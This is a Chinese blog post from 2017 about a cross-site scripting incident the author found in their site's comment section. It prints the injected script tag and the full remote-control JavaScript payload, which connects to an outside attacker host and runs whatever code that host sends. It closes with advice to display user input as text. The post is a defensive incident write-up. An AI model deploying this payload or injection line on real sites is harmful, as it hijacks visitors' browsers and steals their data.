个站攻防——跨站脚本攻击

IT黑名单 2017-7-20 16:44:34

偶然间发现网站评论区内有如下的评论内容:
<script src="http://t.cn/R6Ocbrq"></script>
出于某些原因,网站并没有禁止用户提交html代码段,而且也会原样输出到浏览器。
以上短地址是来自hack网站的一段js脚本,原地址为:https://dev.hacktask.org/p/58de5339fa8289001b5a7036/
js脚本内容如下:
"use strict";var _typeof=typeof Symbol==="function"&&typeof Symbol.iterator==="symbol"?function(obj){return typeof obj}:function(obj){return obj&&typeof Symbol==="function"&&obj.constructor===Symbol&&obj!==Symbol.prototype?"symbol":typeof obj};var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||false;descriptor.configurable=true;if("value"in descriptor)descriptor.writable=true;Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){if(protoProps)defineProperties(Constructor.prototype,protoProps);if(staticProps)defineProperties(Constructor,staticProps);return Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor)){throw new TypeError("Cannot call a class as a function")}}var Client=function(){function Client(projectId,host,protocol){var _this=this;_classCallCheck(this,Client);this.projectId=projectId;this.host=host;this.protocol=protocol;this.basePath=this.protocol+"://"+this.host;this.loadJS(this.basePath+"/socket.io/socket.io.js",function(){_this.socket=_this.Socket()})}_createClass(Client,[{key:"Socket",value:function Socket(){var _this2=this;var socket=io.connect(this.basePath+"/client");socket.on("connect",function(err){if(err)return console.log("服务器连接失败",err);console.log("服务器连接成功");_this2.socket.emit("init",_this2.projectId)}).on("init",function(result){if(!result)return console.log("上线失败");console.log("上线成功",result);setInterval(function(){socket.emit("alive",new Date)},5e3)}).on("inject",function(data){switch(data.action){case"plugin":try{var plugin=eval(data.data);new plugin(data.args,_this2);console.log("执行插件成功",plugin)}catch(err){console.log("执行插件失败",err,data)}break;case"code":try{eval(data.data)}catch(err){console.log(err)}break;default:console.log("未知指令",data.action);break}}).on("disconnect",function(){socket.close()});return socket}},{key:"loadJS",value:function loadJS(url,callback,charset){var head=document.head||document.getElementsByTagName("head")[0]||document.documentElement;var script=document.createElement("script");script.src=url;script.async=true;script.charset=charset||"utf-8";script.onload=script.onreadystatechange=function(){if(!script.readyState||/loaded|complete/.test(script.readyState)){script.parentNode.removeChild(script);script.onload=script.onreadystatechange=null;script=null;if(callback&&typeof callback==="function"){callback()}}};head.appendChild(script)}},{key:"listen",value:function listen(callback){this.removeListen();this.socket.on("send",callback);return this}},{key:"removeListen",value:function removeListen(){this.socket.removeEventListener("send");return this}},{key:"callback",value:function callback(data,opts){var _data=typeof data==="string"?data:(typeof data==="undefined"?"undefined":_typeof(data))==="object"?JSON.stringify(data):String(data);var result={value:_data,type:"string",save:false};for(var _ in opts){result[_]=opts[_]}this.socket.emit("callback",result);return this}}]);return Client}();var projectId="58de5339fa8289001b5a7036";var protocol="https";var host="dev.hacktask.org";window.client=new Client(projectId,host,protocol);
大致上就是在用户客户端建立了一个webscoket连接,进而获取用户数据,还好发现的及时(写文时已发现很久,一直没记录下来),而且站内也没什么数据好给他窃取的。无论如何,html代码段如果放开给用户输入,那么展示时一定要加一定的限制,最好是不给用户直接输入脚本代码,全部当文本展示。
转载请注明来源【IT黑名单

本文链接:http://blog.itblacklist.cn/20170720/8456.html

© Copyright 2016 IT黑名单 Inc.All Rights Reserved. 豫ICP备15018592号-2